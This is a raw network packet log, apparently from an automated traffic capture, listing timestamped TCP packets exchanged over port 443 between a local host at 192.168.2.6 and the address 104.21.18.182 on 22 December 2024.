                                                                                                            Dec 22, 2024 13:42:28.480304003 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.480381966 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.480416059 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.480458975 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.480459929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.485495090 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.485512972 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.485618114 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.485635042 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.485923052 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.490345955 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.490362883 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.490461111 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.490475893 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.490641117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.495820045 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.495836020 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.495917082 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.495930910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.496084929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.501310110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.501327991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.501410007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.501425982 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.501452923 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.501730919 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.506395102 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.506412983 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.506541014 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.506556034 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.506870985 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.511748075 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.511766911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.511895895 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.511910915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.512259007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.517189026 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.517205954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.517261982 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.517276049 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.517304897 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.517322063 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.673763990 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.673784971 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.673840046 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.673863888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.673908949 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.673932076 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.679197073 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.679218054 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.679286957 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.679296017 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.679332018 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.679339886 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.683988094 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.684010029 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.684053898 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.684061050 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.684096098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.684106112 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.689745903 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.689764023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.689841986 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.689851046 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.689896107 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.694807053 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.694828987 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.694891930 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.694900990 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.694941998 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.699873924 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.699893951 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.700086117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.700093985 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.700141907 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.705396891 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.705430984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.705475092 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.705480099 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.705527067 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.705543995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.710237980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.710259914 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.710323095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.710330009 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.710367918 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.865926981 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.865966082 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.865997076 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.866009951 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.866050959 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.866070986 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.871215105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.871242046 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.871289968 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.871296883 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.871340036 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.876710892 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.876737118 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.876785994 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.876791954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.876816988 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.876861095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.881566048 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.881604910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.881633997 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.881640911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.881669044 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.881691933 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.887037039 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.887067080 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.887125015 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.887131929 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.887171984 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.887185097 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.892056942 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.892081022 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.892151117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.892158031 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.892220020 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.897820950 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.897844076 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.897891045 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.897897959 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.897945881 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.902921915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.902961969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.902993917 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.903000116 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:28.903034925 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:28.903057098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.058486938 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.058516979 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.058573961 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.058585882 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.058629990 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.058681011 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.063427925 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.063448906 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.063507080 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.063513994 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.063546896 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.063565016 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.068802118 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.068821907 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.068886995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.068893909 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.068936110 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.074084997 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.074106932 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.074151993 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.074157953 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.074194908 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.074217081 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.079591990 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.079617023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.079672098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.079678059 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.079709053 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.079731941 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.084752083 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.084772110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.084831953 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.084839106 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.084863901 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.084886074 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.089477062 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.089497089 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.089540005 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.089545965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.089572906 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.089593887 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.095061064 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.095082045 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.095146894 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.095154047 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.095194101 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.250319004 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.250349045 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.250426054 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.250437975 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.250488043 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.256038904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.256058931 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.256108999 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.256117105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.256139994 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.256161928 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.261193991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.261215925 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.261286974 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.261293888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.261337996 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.265990019 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.266011000 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.266092062 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.266098976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.266138077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.271533012 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.271555901 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.271619081 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.271625042 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.271687984 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.276534081 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.276561022 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.276618004 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.276623964 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.276665926 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.282321930 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.282342911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.282390118 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.282396078 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.282418966 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.282449007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.287815094 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.287874937 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.287894964 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.287904024 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.287926912 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.287952900 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.443253994 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.443337917 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.443346977 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.443380117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.443409920 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.443430901 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.448028088 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.448080063 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.448118925 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.448126078 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.448152065 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.448179007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.453367949 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.453418016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.453457117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.453461885 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.453495979 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.453519106 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.458410025 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.458456039 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.458488941 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.458494902 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.458544016 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.463691950 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.463737965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.463772058 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.463778019 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.463800907 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.463828087 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.468909025 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.468971014 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.468981028 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.469001055 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.469028950 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.469057083 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.474273920 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.474322081 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.474359989 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.474365950 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.474411011 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.474436045 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.479695082 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.479737997 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.479777098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.479782104 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.479803085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.479826927 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.634861946 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.634924889 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.634958982 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.634989023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.635013103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.635030031 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.641076088 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.641127110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.641160011 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.641165972 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.641192913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.641213894 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.645953894 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.646004915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.646039963 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.646045923 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.646071911 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.646097898 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.650741100 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.650783062 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.650815964 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.650821924 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.650846004 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.650870085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.656143904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.656194925 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.656225920 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.656232119 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.656275034 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.656295061 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.660952091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.661001921 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.661027908 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.661032915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.661056042 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.661082029 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.666462898 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.666506052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.666523933 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.666532993 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.666558027 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.666584015 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.671776056 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.671823978 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.671845913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.671854019 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.671874046 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.671902895 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.827255964 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.827354908 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.827356100 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.827388048 CET44349720104.21.18.182192.168.2.6
